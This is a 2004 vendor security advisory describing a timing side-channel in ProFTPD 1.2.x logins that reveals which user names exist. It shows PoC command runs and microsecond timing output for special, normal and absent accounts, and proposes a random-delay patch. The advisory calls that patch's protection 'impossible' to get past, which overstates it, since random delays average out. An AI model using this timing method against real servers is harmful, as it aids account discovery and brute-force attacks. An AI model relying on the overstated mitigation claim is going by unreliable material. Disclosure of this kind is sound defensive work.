LSS Security Advisory #LSS-2004-10-2 http://security.lss.hr --- Title : ProFTPD 1.2.x remote users enumeration bug Advisory ID : LSS#2004-10-2 Date : October 14th, 2004 Advisory URL: : http://security.lss.hr/index.php?page=details&ID=LSS-2004-10-02 Impact : Remote users enumeration Risk level : Low Vulnerability type : Remote Vendors contacted : Proftpd.org, 09.09.2004. --- ==[ Overview ProFTPD is a very popular FTP (File Transfer Protocol) server, included by default in many Linux/Unix distributions. LSS Security Team discovered a remote users enumeration bug in ProFTPD, which can be used to identify and differentiate valid user accounts on the remote system. Vulnerabilities similar to the one described here have already been discovered on many other network servers. ==[ Vulnerability It is possible to determine which user names are valid, which are special, and which ones do not exist on the remote system. That is accomplished by code execution path timing analysis attack at the ProFTPD login procedure. There is a very small (but significant) difference in time delay of code execution path between valid and non-valid user names. That can be used to remotely determine the difference between existent and non-existent users. The time delay can be measured by using a simple FTP client that will calculate elapsed time between 'USER' command sent by client, and the server response. Because of the very short response period, elapsed time should be measured in microseconds. LSS has developed simple PoC exploit that is presented here: Special user - root: [ljuranic@diana ljuranic]$ ./a.out xxx.xxx.xxx.xxx root Proftpd remote users discovery exploit Coded by Leon / LSS Security >-------------------------------------< Login time: 720 | 493 | 446 | 444 | 443 | 441 | 441 | 442 | Avrg: 483 ..... Login time: 732 | 462 | 445 | 442 | 445 | 442 | 442 | 442 | Avrg: 481 ..... Login time: 725 | 470 | 450 | 447 | 446 | 447 | 446 | 446 | Avrg: 484 Average login time for the special user (root) is about 480 usec. All other special users will have approximately the same login time delay. Normal user - ljuranic: [ljuranic@diana ljuranic]$ ./a.out xxx.xxx.xxx.xxx ljuranic Proftpd remote users discovery exploit Coded by Leon / LSS Security >-------------------------------------< Login time: 885 | 634 | 617 | 615 | 614 | 613 | 615 | 738 | Avrg: 666 ..... Login time: 892 | 701 | 623 | 617 | 618 | 618 | 618 | 616 | Avrg: 662 ..... Login time: 927 | 658 | 622 | 619 | 617 | 616 | 617 | 616 | Avrg: 661 Average login time for normal user (ljuranic) is about 660 usec. All other normal users will have approximately the same login delay. Non existent user - non-existent: [ljuranic@diana ljuranic]$ ./a.out xxx.xxx.xxx.xxx non-existent Proftpd remote users discovery exploit Coded by Leon / LSS Security >-------------------------------------< Login time: 656 | 417 | 401 | 398 | 398 | 395 | 396 | 397 | Avrg: 432 ..... Login time: 647 | 418 | 401 | 400 | 400 | 399 | 399 | 399 | Avrg: 432 ..... Login time: 647 | 413 | 401 | 400 | 400 | 400 | 400 | 400 | Avrg: 432 Average login time for non existent user is about 430 usec. The time difference between three types of user accounts is evident, making it easy to determine other valid, non-valid, and special user accounts. This vulnerability can be used to launch more efficient brute-force attacks. ===[ Affected versions Vulnerability was successfully tested on ProFTPD versions 1.2.8 and 1.2.10, but other versions may be vulnerable as well. Test server was placed on the local Ethernet 10/100 network, and tests were conducted over the Internet. ===[ Fix Pseudo-random usleep() at the login procedure that will obfuscate time leak. Something like this: proftpd-1.2.10/modules/mod_auth.c 1867a1868,1877 > { > unsigned int randa; > struct timeval tv; > struct timezone tz; > gettimeofday (&tv, &tz); > srand(tv.tv_usec); > randa = rand() % 20000; > usleep(randa); > } > After this simple patch is applied, it is impossible to tell which users do and don't exist: [ljuranic@diana ljuranic]$ ./a.out xxx.xxx.xxx.xxx root Proftpd remote users discovery exploit Coded by Leon / LSS Security >-------------------------------------< Login time: 14954 | 29854 | 19939 | 20024 | 20044 | 19931 | 29988 | 30009| Avrg: 23092 ..... Login time: 11677 | 19802 | 20042 | 29941 | 20093 | 19899 | 20005 | 30015| Avrg: 21434 ..... Login time: 18027 | 20062 | 19877 | 20006 | 20050 | 30049 | 19906 | 29989| Avrg: 22245 ===[ PoC Exploit http://security.lss.hr/Poc/ ===[ Credits This vulnerability was found by Leon Juranic (ljuranic@xxxxxx). ===[ LSS Security Contact LSS Security Team, <eXposed by LSS> WWW : http://security.lss.hr E-mail : security@xxxxxx Tel : +385 1 6129 775
